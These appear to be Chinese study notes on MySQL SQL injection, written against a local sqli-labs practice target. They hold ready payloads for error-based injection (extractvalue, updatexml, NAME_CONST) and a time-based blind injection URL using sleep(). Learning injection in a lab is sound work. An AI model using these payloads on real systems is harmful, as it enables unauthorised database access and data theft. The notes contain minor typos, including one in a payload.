知识点补充：
extractvalue和upadatexml 函数返回ture or false
extractvalue语法: extractvalue(目标xml文档，xml路径)>>通过xml路径语法错误实现sql报错注入
upadatexml语法: updatexml(XML_DOCUMENT,XPATH_STRING,NEW_VALUE);
第一个参数：XML_DOCUMENT是STRING格式，为XML文档对象的名称
第二个参数：xPATCH_string(Xpath格式的字符串)
第三个参数：new_value,Stirng格式，替换查找到的符合条件的数据。作用改变文档中符合条件的节点值

concat():拼接不同列内容，分行
group_concat():拼接不同列内容，整合为一行

0x01 基于报错的SQL盲注

构造payload使得所需信息通过错误回显

1. Xpath函数报错

extractvalue函数payload
extractvalue(1,concat(0x7e,(select @@verion),0x7e))

updatexml函数payload
updatexml(1,concat(0x7e,(select @@version),0x7e),1)

2. 数据重复性错误

payload:
select 1,2,3 from (select NAME_CONST(version(),1),NAME_CONST(version(),1))x

0x02 延时注入

利用sleep()函数进行注入
IF(a,b,c):如果a为真执行b,为假执行c
payload:http://127.0.0.1/sqllib/Less-5/?id=1'and If(ascii(substr(database(),1,1))=115,1,sleep(5))--+